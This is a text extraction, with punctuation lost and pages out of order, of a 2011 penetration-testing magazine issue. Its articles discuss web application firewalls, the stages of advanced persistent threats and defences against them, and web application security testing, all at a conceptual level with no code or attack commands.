Above all the common practice of adapting tried and tested technologies for developing web applications is dangerous without having subjected them to prior security and qualification tests In the belief that the existing network firewall would provide the required protection if possible weaknesses were to become apparent those responsible unwittingly grant access to systems within the corporate boundaries And thereby
First the Security Gate then the AirplaneWhat needs to be heeded when checking web applications
Anyone developing a new software program will usually have an idea of the features and functions that the program should master The subject of security is however often an afterthought But with web applications the backlash comes quickly because many are accessible for everyone worldwide
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
professional software engineering was not necessarily at the top of the agenda So web applications usually went into productive operation without any clear security standards Their security standard was based solely on how the individual developers rated this aspect and how high their respective knowledge was
The problem with more recent web applications Many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic These include for example Ajax and JavaScript While the browser was originally only a passive tool for viewing web sites it has now evolved into an autonomous active element and has actually become a kind of operating system for the plug-ins and add-ons But that makes the browser and its tools vulnerable The attackers gain access to the browser via infected web applications and as such to further systems and to their ownersrsquo or usersrsquo sensitive data
Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data This is completely wrong The opposite is the case One single unsecured web application endangers the security of further systems that follow on such as application or database servers Equally wrong is the common misconception that the telecom providersrsquo security services would protect the data Providers are not responsible for a safe use of web applications regardless of where they are hosted Suppliers and operators of web applications are the ones who have the big responsibility here towards all those who use their applications one which they often do not fulfill
they disclose sensitive data and make processes vulnerable But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications
As a result critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible in the web Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here Particularly in association with the web the security requirements for applications have a different focus and are much higher than for traditional network security The requirements of service providers who conduct security checks on business-critical systems with penetration tests should then also be respectively higher
While most companies in the meantime protect their networks to a relatively high standard the hackers have long since moved on to a different playing field They now take advantage of security loopholes in web applications There are several reasons for this Compared with the network level you donrsquot need to be highly skilled to use the internet This not only makes it easier to use legitimately but also encourages the malicious misuse of web applications In addition the internet also offers many possibilities for concealment and making action anonymous As a result the risk for attackers remains relatively low and so does the inhibition threshold for hackers
Many web applications that are still active today were developed at a time when awareness for application security in the internet had not yet been raised There were hardly any threat scenarios because the attackersrsquo focus was directed at the internal IT structure of the companies In the first years of web usage in particular
Figure 1 This model (based on Everett M Rogers adoption curve from ldquoDiffusion of innovationsrdquo) shows a time lag between the adoption of new technology and the securing of the new technology Both exhibit the similar Technology Adoption Lifecycle There is an inection point when a technology becomes widely enough accepted and therefore economically relevant for hackers resulting in a period of Peak Vulnerability Bottom line Security is an afterthought
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
Web Applications Under FireThe security issues for web applications have not escaped the attackers and they have been exploiting these shortcomings in the IT environments for some time now There are numerous attack scenarios using which they can obtain access to corporate data and processes or even external systems via web applications For years now the major types have been
All injection attacks (such as SQL Injection Command Injection LDAP Injection Script Injection XPath Injection)
bull Cross Site Scripting (XSS)bull Hidden Field Tamperingbull Parameter Tamperingbull Cookie Poisoningbull Buffer Overflowbull Forceful Browsingbull Unauthorized access to web serversbull Search Engine Poisoning bull Social Engineering
The only more recent trend The attackers have recently started to combine the methods more often in order to obtain even higher success rates And here it is no longer just the large corporations who are targeted because they usually guard and conceal their systems better Instead an increasing number of smaller companies are now in the crossfire
One ExampleAttackers know that a certain commercial software program is widely used for shopping carts in online shops and that the smaller companies rarely patch the weak points They launch automated attacks in order to identify ndash with high efficiency ndash as many worthwhile targets as possible in the web In this step they already gather the required data about the underlying software the operating system or the database from web applications which give away information freely The attackers then only have to evaluate this information As such they have an extensive basis for later targeted attacks
How to Make a Web Application SecureThere are two ways of actually securing the data and processes that are connected to web applications The first way would be to program each application absolutely error-free under the required application conditions and security aspects according to predefined guidelines Companies would have to increase the security of older web applications to the required standards later
However this intention is generally doomed to failure from the outset because the later integration of security functions in an existing application is in most cases not only difficult but also above all expensive Another example a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked It is then not sufficient to just add new functions The developers must start by precisely analyzing the program and then making deep inroads into its basic structures This is not only tedious but also harbors the danger of making mistakes Another example is programs that do not just use the session attributes for authentification In this case it is not straightforward to update the session ID after logging in This makes the application susceptible for Session Fixation
If existing web applications display weak spots ndash and the probability is relatively high ndash then it should be clarified whether it makes business sense to correct them It should not be forgotten here that other systems are put at risk by the unsecured application A risk analysis can bring clarity whether and to what extent the problems must be resolved or if further measures should be taken at the same time Often however the program developers are no longer available and training new developers as well as analyzing the web application results in additional costs
The situation is not much better with web applications that are to be developed from scratch There is no software program that ever went into productive operation free of errors or without weak spots The shortcomings are frequently uncovered over time And by this time correcting the errors is once again time-consuming and expensive In addition the application cannot be deactivated during this period if it works as a sales driver or as an important business process Despite this the demand for good code programming that sensibly combines effectiveness functionality and security still has top priority The safer a web application is written the lower the improvement work and the less complex the external security measures that have to be adopted
The second approach in addition to secure programming is the general safeguarding of web applications with a special security system from the time it goes into operation Such security systems are called Web Application Firewalls (WAF) and safeguard the operation of web applications
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP) As such it represents a special case of Application-Level-Firewalls (ALF) or Application-Level-Gateways (ALG) In contrast with classic firewalls and Intrusion Detection
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
systems (IDS) a WAF checks the communications at the application level Normally the web application to be protected does not have to be changed
Secure programming and WAFs are not contradictory but actually complement each other Analog to flight traffic it is without doubt important that the airplane (the application itself) is well serviced and safe But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall) which as the first security layer considerably minimizes the risks of attacks on any weak spots
After introducing a WAF it is still recommendable to check the security functions as conducted by Penetration Testers This might reveal for example that the system can be misused by SQL Injection by entering inverted commas It would be a costly procedure to correct this error in the web application If a WAF is also deployed as a protective system then this can be configured to filter the inverted commas out of the data traffic This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis This would lead to misjudging the achieved security status Filtering out special characters does not always prevent an attack based on the SQL Injection principle Additionally the system performance would suffer as the security rules would have to be set as restrictively as possible in order to exclude all possible threats In this context too penetration tests make an important contribution to increasing the Web Application Security
WAF FunctionalityA major advantage of WAFs is that one single system can close the security loopholes for several web
applications If they are run in redundant mode they can also conduct load balancing functions in order to distribute data traffic better and increase the performance for the web applications With content caching functions they reduce the load on the backend web servers and via automated compression procedures they reduce the band width requirements of the client browser
In order to protect the web applications the WAFs filter the data flow between the browser and the web application If an entry pattern emerges here that is defined as invalid then the WAF interrupts the data transfer or reacts in a different way that has been predefined in the configuration diagram If for example two parameters have been defined for a monitored entry form then the WAF can block all requests that contain three or more parameters In this way the length and the contents of parameters can also be checked Many attacks can be prevented or at least made more difficult just by specifying general rules about the parameter quality such as their maximum length valid number of characters and permitted value area
Of course an integrated XML Firewall should also be the standard these days because increasingly more web applications are based on XML code This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning A fully-developed rule for access numbers with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or Brute Force attacks However every file that is uploaded to the web application can represent a danger if it contains a virus worm Trojan or similar A virus scanner integrated into the WAF checks every file before it is sent to the web application
Figure 2 An overview of how a Web Application Firewall works
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn their nature In this way these filters can ndash to a certain extent ndash automatically prevent malicious code from reaching the browser if for example a web application does not conduct sufficient checks of the original data Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters However in practice a whitelist only approach is quite cumbersome requiring constant re-learning if there are any changes to the application As a result whitelist only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles However the contrary blacklist only approach offers attackers too many loopholes Consequently the ideal solution should rely on a combination of both whitelisting and blacklisting This can be made easy-to-use by using templated negative security profile (eg for standard usages like Outlook Web Access SharePoint or Oracle applications) augmented by a whitelist for high value sub-section like an order entry page
To prevent a high number of false positives some manufacturers provide an exception profiler This flags entries in possible violation of the policies but can still be categorized as legitimate based on an extensive heuristic analysis to the administrator At the same time the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated
Some WAFs provide different operating modes Bridge Mode (as Bridge Path) or Proxy Mode (as One-
Arm Proxy or Full Reverse Proxy) In Bridge Mode the WAF is used as an In-Line Bridge Path and works with the same address for the virtual IP and the backend server Although this configuration avoids changes to the existing network structure and as such can be integrated very easily and fast to protect an endangered web application Bridge Mode deployments sacrifice security and application acceleration for network simplicity Additionally this mode means that all data is passed on to the web application including potential attacks ndash even if the security checks have been conducted
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration as this is used in line and uses both of the systemrsquos physical ports (WAN and LAN) As a proxy WAFs have the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery which is not possible in Bridge Mode And only special functions are available here As a Full Reverse Proxy a WAF provides for example Instant SSL that converts http-pages into HTTPS without making changes to the code
Proxy WAFs also provide a whole range of further security functions They facilitate the translation of web addresses and as such the overwriting of URLs used by public requests to the web applicationrsquos hidden URL This means that the applicationrsquos actual web address remains cloaked With Proxy WAFs SSL is much faster and the response times for the web application can also be accelerated They also facilitate cloaking techniques Level 7 rules (to avoid Denial of Service attacks) as well as authentication and authorization Cloaking the concealment of onersquos
Figure 3 A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
own IT infrastructure is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey By masking outgoing data protection can be obtained against data theft and Cookie-Security prevents identity theft But the Proxy-WAFs must also be configured to correspond with the respective terms Penetration tests help with the correct configuration
Demands on Penetration TestersWhen penetration testers look for weak spots they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 20 This defines rules for distributing and storing Primary Account Number (PAN) information The companies are required to develop secure web applications and maintain them constantly Further points define formal risk checks and test processes that are intended to uncover high risk weak spots In order to check whether systems comply with PCI DSS penetration testers must heed the following requirements
bull Does the system have a Web Application Firewallbull Does the web traffic occur via a WAF Proxy
functionbull Are the web servers shielded against direct access
by attackersbull Is there a simple SSL encryption for the data traffic
even if the application or the server do not support this
bull Are all known and unknown threats blocked
A further point is the protection against data theft This involves checking whether the protection mechanism checks the outgoing data traffic for the possible withdrawal of sensitive data and then stops it
Penetration testers can fall back on web scanners to run security checks on web applications Several WAFs provide extra interfaces to automate tests
Since by its very nature a WAF stands on the frontline certain test criteria should be applied to it as well These include in particular the identity and access management In this context the principle of least privileges applies The users are only awarded those privileges on a need-to-have basis for their work or the use of the web application All other privileges are blocked A general integration of the WAF in Active Directory eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier
The user interface is also an especially critical point because it is the basis for safe WAF configuration Unintelligible or poorly structured user interfaces
lead to incorrect settings which cancel out the protective functions If by contrast the functions can be recorded intuitively are clearly displayed easy to understand and to set then this in practice makes the greatest contribution to system security A further plus is a user interface which is identical across several of the manufacturerrsquos products or even better a management center which administrators can use to manage numerous other network and security products with as well as the WAF The administrators can then rely on the known settings processes for security clusters This ensures that security configurations for each cluster are consistent across the organization An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account for the evaluation along with the consistency of security deployment across applications and sites
In summary any web application old or new needs to be secured by a WAF in Full Proxy Mode Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place It should also check whether it prevents the hacking of the application itself with common or new means whether it secures all the backend systems the application connects to and it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out If penetration testers are not only looking for a security snap shot but want to help their customers in creating sustainable security they should always include the WAFrsquos administration into their assessment
OLIVER WAIOliver Wai leads product marketing for Barracudarsquos line of Web application security and application delivery product lines In his role Oliver is a core member of Barracudarsquos security incident response team and writes frequently about the latest application security threats Prior to Barracuda Networks Oliver held positions at Google Integration Appliance and Brocade Communications Oliver has an MS in Management Science amp Engineering from Stanford University and BS (Cum Laude) in Computer Engineering from Santa Clara University
In the upcoming issue of the
If you would like to contact Pentest team just send an email to enpentestmagcom We will reply immediately We will reply asap
Web Session Management
Password management in code
ETHical Ghosts on SF1
Preservation namely in the online gambling industry
Cyber Security War
Available to download on December 22th
trade
To Do Listhellip
nalyzing oftware ecurity tilizing isk valuationtrade
Scan code for more on the state of software security
Know your softwarersquos pedigree Get ASSUREtrade
Learn more about software security assurance by visiting or by calling +1 (678) 809-2100
- Cover13
- EDITORrsquoS NOTE
- CONTENTS
- CONTENTS 213
- The Significance Of HTTP And The Web For Advanced Persistent 13Threats
- Web 13Application Security and Penetration Testing
- Developersare from Venus Application Security guys from 13Mars
- Pulling the Legs of 13Arachni
- XSS Beef Metaspoilt 13Exploitation
- Cross-site Request Forgery 13IN-DEPTH ANALYSIS bull CYBER GATES bull 2011
- First the Security Gate then the Airplane What needs to be heeded when checking web 13applications
-
Page 4 httppentestmagcom012011 (1) November Page 5 httppentestmagcom012011 (1) November
TEAMEditor Katarzyna Zwierowicz katarzynazwierowiczsoftwarecompl
Betatesters Jeff Weaver Daniel Wood Edward Wierzyn Davide Quarta
Senior ConsultantPublisher Paweł Marciniak
CEO Ewa Dudzicewadudzicsoftwarecompl
Art Director Ireneusz Pogroszewski ireneuszpogroszewskisoftwarecomplDTP Ireneusz Pogroszewski
Production Director Andrzej Kuca andrzejkucasoftwarecompl
Marketing Director Ewa Dudzicewadudzicsoftwarecompl
Publisher Software Press Sp z oo SK02-682 Warszawa ul Bokserska 1Phone 1 917 338 3631wwwpentestmagcom
Whilst every effort has been made to ensure the high quality of the magazine the editors make no warranty express or implied concerning the results of content usageAll trade marks presented in the magazine were used only for informative purposes
All rights to trade marks presented in the magazine are reserved by the companies which own themTo create graphs and diagrams we used program by
Mathematical formulas created by Design Science MathTypetrade
DISCLAIMERThe techniques described in our articles may only be used in private local networks The editors hold no responsibility for misuse of the presented techniques or consequent data loss
in Ruby by Tasos ldquoZapotekrdquo Laskos Step by step author acquaints us with process of instalation and using the programm Also shows us clearly the advantages and disadvantages of Arachni
XSS BeeF Metaspolit ExploitationBy Arvind Doraiswamy
Cross Site scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code on the victimrsquos browser The impact of an XSS attack is only limited by the potency of the attackerrsquos JavaScript code In this article Arvind Doraiswamy shows us how an attacker can gain complete control over a userrsquos browser ultimately taking over the userrsquos machine by using BeeF
Cross-site request forgery In-depth analysis by Samvel Gevorgyan
Cross-Site Request Forgery (CSRF in short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of the authorized users Samvel Gevorgyan step by step describes how to proceed with CSRF vulnerability
WEB APPS CHECKINGFirst the Security Gate then the Airplaneby Olivier Wai
Olivier Wai is trying to give us the answer ldquoWhat needs to be heeded when checking web applicationsrdquo Any web application old or new needs to be secured by a Web Application Firewalls (WAFs) in Full Proxy Mode Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place Web Application Firewalls (WAFs) If penetration testers are not only looking for a security snap shot but want to help their customers in creating sustainable security they should always include the WAFrsquos administration into their assessment
CONTENTS
38
34
30
EDITORrsquoS NOTE
ADVANCED PERSISTENT THREATS
Page 6 httppentestmagcom012011 (1) November Page 7 httppentestmagcom012011 (1) November
The omnipresence of the Web is now a given and it serves a wide variety of situations as detailed n the non-exhaustive list below
bull Community applicationsbull Institutional Web sites bull Online transactionsbull Business applicationsbull IntranetExtranetbull Entertainmentbull Medical databull Etc
In response to user requirements and developing needs content driven by HTTP has become incre-asingly rich and dynamic It even goes as far as incorporating script languages that transform the Web browser into a universal enhanced client that espouses different platforms PC Mac and Mobile users all form part of the connected masses operating on their chosen platforms But have these new privileges arrived without any underlying constraints
The race towards sophistication has not been accompanied by similar developments in respect of the security and reliability of data circulated across the Web A concrete example is the fact that HTTP does not provide native support for sessions and it is therefore
difficult to be sure that requests received during browsing emanate from the same user Large scale use of the Web illustrates the
discrepancy that exists in terms of security versus volume and this inherent flaw has become a major IT system issue making HTTP a preferred vector of attacks and data compromise
Cybercriminals are aware of the exploitability of the Web and have made it their number one target Not a week goes by without a an organization being compromised via HTTP
bull Playstation Network (Sony) -gt Wordpress version problem
bull MySQL (Oracle) -gt SQL Injectionbull RSA (EMC) -gt SQL Injectionbull TJX -gt SQL Injection
The above attacks conceived and carried out with precise attention to logistics are by no means an innovation but we now refer to them differently using the term APT Advanced Persistent Threat
Bolstered cyber-activity the discovery of intrusion and updated legislation entailing mandatory declaration of incidents collectively lead to extensive media coverage which in turn amplifies the impact on the image of the unfortunate victims that are more often than not high-profile businesses or international organizations
The SignificanceOf HTTP And The Web For Advanced Persistent
Threats
Initially created in 1989 by Tim Berners-Lee of the CERN Hypertext Transfer Protocol (HTTP) was actually launched one year later and continues to use specifications that date to 1999 ndash a mere time lapse of twenty-two years in the transmission of Web-based content
ADVANCED PERSISTENT THREATS
Page 6 httppentestmagcom012011 (1) November Page 7 httppentestmagcom012011 (1) November
The use of HTTP may be required because different areas are often filtered out leaving only necessary protocols to emerge HTTP is often left open to allow administrators to navigate through these machines or to update them
To remain as stealthy as possible a strategic backdoor to the Web application or the application server will use HTTP as a direct connection and or as a tunnel to other applications During the movement it will not be filtered and no attention will be drawn to a process that opens a port unknown to the system
Bounce MechanismsWhenever changes occur witin an IT system the steps involving initial intrusion and continued presence are repeated as many times as necessary until it the goal is attained and sensitive data becomes accessibleHTTP once again comes into play during these stages of development because it is predominantly active and open between the different areas
bull Dialogue between server applicationsbull Web Servicesbull Web Administration Interfacebull Etc
It often happens that security policies contain the same weaknesses from one area to another
bull Exit ports openedbull Filtering omission on higher level portsbull Use of the same default passwords
Data ExtractionOnce crucial information is reached it is necessary to quit the system as discreetly as possible and over a certain length of time HTTP protocol is often enabled for exit without being monitored for several reasons
bull Machines are often updated using HTTP bull When an administrator logs on to a remote
machine he will often require access to a website bull Since these areas are often regarded as bdquosaferdquo
zones restrictions are lower and controls less strict
What Protective Measures Can Be DeployedApplication security has become major issue in the business world Whereas network security is fairly conventional and primarily leans on the filtering of destinations sources IP and Ports in most cases application security is more complex and involves applications that are often unique bespoke and
Anatomy of an APTAdvanced Persistent Threats are attacks calculated for latent effect and vested with a specific purpose that of retrieving sensitive or critical data
Several steps are necessary to reach the goal
bull The initial intrusionbull Continued presence within the IT systembull Bounce mechanism and in depth infiltrationbull Data extraction
HTTP plays an important role during the attacks firstly because it is predominantly present during the various stages and furthermore because it is often the only available protocol that can serve as an attack vector
The Initial IntrusionThe system is invaded by an attack focused on an area exposed to the public on the Internet In the case of Sony Playstation Network for instance the intrusion took place via their blog that used a vulnerable version of WordPress
These days it is unusual for any organization to do without a website and the latter can range from basic and simple to complex and dynamic
The website plays the role of a gateway that provides the initial point of entry into an infrastructure It becomes an outpost that enables important information to be gathered in order to successfully carry out the rest of the attack In addition depending on the application infrastructure location and lack of compartmentalization it is possible for a simple scarcely-used application to be found near or on the same server as a business application The attack will bounce from the one to the other and the business application which will then become accessible and provide more access privileges
Retrieval of information is often the vital issue during the bounce mechanism and and extended infiltration intothe system Some examples of the data targeted
bull User Passwords bull Hardware and network destinations -gt discoverybull Connectors to other systems -gt new protocolsbull Etc
Continued presenceAfter the initial inroads into the structure the next phase requires that presence within the system remains secure The machine has to be re-accessed and exploited without arousing the suspicions of system administrators
ADVANCED PERSISTENT THREATS
Page 8 httppentestmagcom012011 (1) November Page 9 httppentestmagcom012011 (1) November
deployed with many more specifications relating to infrastructureThree steps are necessary to prevent or respond properly to an APT
bull Preventionbull Responsebull Forensics
PreventionIdeally security should be addressed at the very beginning when software and even the application infrastructure are still at the conception stage It is necessary to follow certain rules which will condition the response to different threats
Define a Secure Application InfrastructurePartition the NetworkThis measure is one of the pillars of the PCI-DSS and for good reason Keeping sections separate can limit the impact of an intrusion making it more difficult to obtainsatisfaction because of the large number of bounces required to attain sensitive data Each zone also deploys a security policy adapted to its content whether the flow is inbound or outbound
Moreover partitioning allows for easier forensic analysis in case of a compromise It is easier to understand the steps and measure the impact and the depth of the attack when one is able to analyze each area separately Unfortunately there are many systems described as flat infrastructures that contain a variety of applications housed in the same area After an incident has occurred it is difficult to determine precisely which applications have been compromised and what data has been hijacked
Separation of ApplicationsApplications can be separated using criteria such as data categorization or the level of risk attached to the application Clustering provides numerous advantages
bull It promotes rationalization in the design of security policies which are more or less complex depending on the type of data and the structure of the application to secure
bull It enhances understanding of an attack and by doing so facilitates the search for evidence which will then be based on the criticality of data and complexity of applications
Anticipate Possible OutcomesTo better understand the scope of an attack it is necessary to anticipate the options available to a
hacker once an application has been compromised Once this is done it is necessary to anticipate the procedures required to analyze verify and understand the attack We should bear in mind that an area of the infrastructure in which it is impossible to install a monitoring tool will be very complex to analyze during an incident In such a case it is necessary to predefine the tools and procedures for investigations and or monitoring
Risk analysis and attack guidelinesThis step allows a precise understanding of risks based on the data manipulated by applications
It has to be carried out by studying web applications their operation and business logic
Once each data component has been identified it is possible to draw up a list of rules and regulations that need to be followed by the application infrastructure
Developer TrainingApplications are commonly developed following specific business imperatives and often with the added stress of meeting availability deadlines Developers do not place security high up on their list of priorities and it is often overlooked in the process
However there are several ways to significantly reduce risk
bull Raising developer awareness of application attacksbull OWASP TOP10bull WASC TC v2
bull The use of libraries to filter inputbull Libraries are available for all languages
bull Setting up audit functions logs and traceabilitybull Accurate analysis of how the application works
Regular Auditing Code analysisYou can resort to manual code analysis by an auditor or to automated analysis by using the tools available to find vulnerabilities in the source code of web applications These tools often require complex configuration This step is useful to detect vulnerabilities before going into production and thus to fix them before they are exploited
Unfortunately the practice is only possible if you have access to the source code of the application Closed source software packages cannot be analyzed
Scanning and penetration testingAll applications can be scanned and pentested They also require configuration and or a thorough analysis of the application to determine the credentials necessary
ADVANCED PERSISTENT THREATS
Page 8 httppentestmagcom012011 (1) November Page 9 httppentestmagcom012011 (1) November
for navigation or resources to be avoided because of their capacity to cause significant damage (eg links enabling the deletion of entries in the database)
These tests have to be reproduced as often as possible and whenever a change in the application is put in place by developers
Appropriate ResponseTraditional firewalls do not filter network application protocols at best the so-called next-generation model can recognize a type of protocol and filter content in the manner of an IPS by recognizing attack patterns This response is clearly inadequate
Each zone containing web applications has to be filtered on incoming and outgoing content and on the use of the protocol itself
This type of deployment is often called deep defense and has the ability to monitor the various attacks at both the application and network levels
Last but not least the association of the identity context with security policy allows better detection of anomalies
Traffic Filtering The WAF (Web Application Firewall)Web application firewalls can be considered as an extension of application network firewalls They are able to analyze HTTP and the content it conveys The device is strongly recommended by section 66 of PCI-DSS
Often used in reverse proxy mode it allows for a break in protocol and facilitates the restructuring of areas between applications
The WAFEC document (Web Application Firewall Evaluation Criteria) published by WASC is a useful guideline that helps to understand and evaluate different vendors as needed
The WAF also helps to monitor and alert in case of threat in order to trigger a rapid response (eg blocking the IP of the attacker via a dialogue protocol with network firewalls)
Traffic Filtering The WSF (Web Services Firewall)It represents an extension of the WAF on the protocols carrying XML traffic over HTTP such as SOAP or REST
XML and its standards make security management easier in the sense that the operation of the service is described by documents generated directly by the development framework (eg WSDL Schemas)
Web services are vulnerable to the same attacks as web applications they consequently need the same
kind of protection Their position in the application infrastructure however is much more critical They are often located at the heart of sensitive information zones and connected directly via private links to partner infrastructures
The WSF provides security on the message format and content but also on the use of a service The use or production of a web service entails contract between two parties on the type of use (eg number of messages per day data type etc) The WSF will also serve to monitor this function and to ensure respect of SLA between the two parties
Authentication AuthorizationApplications use identities to control access to various resources and functions
The association of the identity context and security increases efficiency in the detection of anomalies For example a whitelist adapted according to the type of user can verify access to information based on user role
Ensuring Continuity of ServiceApplication security is primarily related to the exploitation of vulnerabilities in order to divert normal use for malicious purposes
However some attacks based on weaknesses can be devastating in effect perpetrated to make the application unavailable and thereby provoke losses due to activity downtime
To retaliate it is necessary to establish protective measures that block denial of service and automated processes and to ensure load balancing and SSL acceleration
OperationMonitoringIt is important to understand the use of the application during production to monitor and detect abnormal behavior and make decisions accordingly
bull Blacklistbull Legal Actionbull Redirection to a honeypot
Log CorrelationUnderstanding abnormal behavior in an application helps in locating an attack
An application infrastructure can comprise hundreds of applications
To understand the attack as a whole and monitor changes (discovery aggression compromise) it is necessary to have holistic view
ADVANCED PERSISTENT THREATS
Page 10 httppentestmagcom012011 (1) November
To do this it is imperative to confront and correlate logs correlation to obtain real-time overall analysis and understand the threat mechanics
bull Mass Attack on a type of applicationbull Attack targeting a specific applicationbull Attacks focused on a type of data
Reporting and AlertingThe dialogue between application network and security teams is often complex within an organization Formalized reports on attacks and the use of the application provide a basis for work and an understanding of application threats for these teams
Alerts will enable them to react and trigger procedures either at the network level by blocking the IP of the attacker or at the application level by forbidding access to resources areas or more directly by referral to a honeypot in view of analyzing the behavior of the attacker
ForensicsUnderstanding the scope of an attackFor each area compromised it is important to understand what elements have been impacted and to trace the attack to the roots of the intrusion and compromise by the installation of a backdoor bounce mechanisms to other areas and or extraction of data
Analysis of application componentsTo understand how the intrusion occurred it is
important to look for abnormal uses One example could be the presence of anomalous data in a variable a cookie To drill down to this level the logs of the various application components turn out to be very useful
bull Web server or applicationbull Databasebull Directorybull Etc
Systems AnalysisTo understand how the attacker remained in the area it is important to identify the type of backdoor used From the simplest act such as the placing an executable file in the application itself to the injection of code into a process (eg hook network functions) it is necessary to analyze the system hosting the application
bull Changed configuration filesbull Users addedbull Security rules changed
bull Errors of execution or increase in privileges
bull Unknown daemons or unusual groups and users bull Etc
Analysis of network equipmentDuring the various bounces within the application infrastructure the discovery and exploration of new possibilities leaves fingerprints Network firewalls keep precious logs with traces of these attempts In addition if access is logged it is important to check if there are connections to web applications at unusual times
The End justifies the MeansIn conclusion we can see that the means used to achieve an APT are often substantial and proportional to the criticality of targeted data APT are not just temporary attacks but real and constant threats with latent effect that need to fought in the long run
The security of an application infrastructure begins with the conception process and requires basic rules to be respected to simply security operations
Real-life experience of application management highlights difficulties in implementing all the good practices
A comprehensive study of threats appropriate response and anticipation of possible incidents are now the recommended procedure in dealing with application attacks
MATTHIEU ESTRADEMatthieu Estrade has 14 years experience in internet security In 2001 Matthieu designed a pioneering application rewall based on Web Reverse Proxy Technology for the company Axiliance As a well known specialist in his eld he soon became a member of the Open Source Apache HTTP server development team His security expertise has been put to contribution in WASC (Web Application Security Consortium) projects like WAFEC and WASSEC Matthieu is also a member of the French OWASP chapter Matthieu is currently CTO at BeeWare
a d v e r t i s e m e n t
WEB APP SECURITY
Page 12 httppentestmagcom012011 (1) November
Dynamic web applications usually use technologies such as ASP ASPNet PHP Ajax JSP Perl Cold Fusion Flash and etc
These applications expose financial data customer information and other sensitive and confidential data that required authentication and authorization Ensuring that the web applications are secure is a critical mission that businesses have to go through to achieve the desired security level of such applications With the accessibility of such critical data to the public domain web application security testing also becomes paramount process for all the web applications that are exposed to the outside world
IntroductionPenetration testing (It is also called Pen Testing) is usually conducted by ethical hackers where the security team reviews application security vulnerabilities to discover potential security risks Such process requires a deep knowledge experience in a variety of different tools and a range of exploits that can achieve the required tasks
During the pen testing different web applicationsrsquo vulnerabilities are tested (eg Input Validation Buffer Overflow Cross Site Scripting URL Manipulation SQL Injection Cookie Modification Bypassing Authentication and Code Execution) A typical pen testing involves the following procedures
bull Identification of Ports ndash In this process ports are scanned and the associated services running are identified
bull Software Services Analyzed ndash In this process both automated and manual testing is conducted to discover weaknesses
bull Verification of Vulnerabilities ndash This process helps verify that the vulnerabilities are real where weakness might be exploited to help remediate the issues
bull Remediation of Vulnerabilities ndash In this process the vulnerabilities will be resolved and such vulnerabilities will be re-tested to ensure they have been addressed
Part of the initiative of securing the web applications is to include the security development lifecycle as part of the software development lifecycle where the number of security-related design and coding defects can be reduced and also the severity of any defects that do remain undetected can be reduced or eliminated Despite the fact that the above initiatives solve some of the security problems some of undiscovered defects will remain even in the most scrutinized web applications Until scanners can harness true artificial intelligence and put the anomalies into context or make normative judgments about them the struggle to find certain vulnerabilities will exist
WebApplication Security and Penetration Testing
In the recent years web applications have grown dramatically within many organizations and businesses where such entities became very independent on such technology as part of their businessesrsquo lifecycle
Automated Scanning vs Manual Penetration TestingA vulnerabilities assessment simply identifies and reports vulnerabilities whereas a pen testing attempts to exploit vulnerabilities to determine whether unauthorized access to other malicious activities is possible By performing a pen testing to simulate an attack itrsquos possible to evaluate whether an application has any potential vulnerabilities resulting from poor or improper system configuration hardware or software flaws or weaknesses in the perimeter defences protecting the application
With more than 75 of the attacks occurring over the HTTPS protocols and more than 90 of web applications containing some type of security vulnerability it is essential that organizations implement strong measures to secure their web applications Most of these attacks occur on the front door of the organization where the entire online community has an access to these doors (ie port 80 and port 443) With the complexity and the tremendous amount of sensitive data exist within web applications consumers not only expect but also demand security for this information
That said securing a web application goes far beyond testing the application using automated systems and tools or by using manual processes The security implementation begins in the conceptual phase where the modeling of the security risk is introduced by the application and the countermeasures that are required to be implemented It is imperative that the web application security should be thought of as another quality vector of every application that has to be considered through every step of the application lifecycle
Discovering web application vulnerabilities can be performed through different processes
bull Automation process ndash where scanning tools or static analysis tools will be used
bull Manual process ndash where penetration testing or code review will be used
Web application vulnerability types can be grouped into two categories
Technical VulnerabilitiesWhere such vulnerabilities can be examined through the following tests Cross-Site-Scripting Injection Flaws and Buffer Overflow Automated systems and tools which analyze and test the web applications are much better equipped to test for technical vulnerabilities than the manual penetration tests While automated testing and scanning tools may not be able
012011 (1) November
WEB APP SECURITY
Page 14 httppentestmagcom012011 (1) November Page 15 httppentestmagcom012011 (1) November
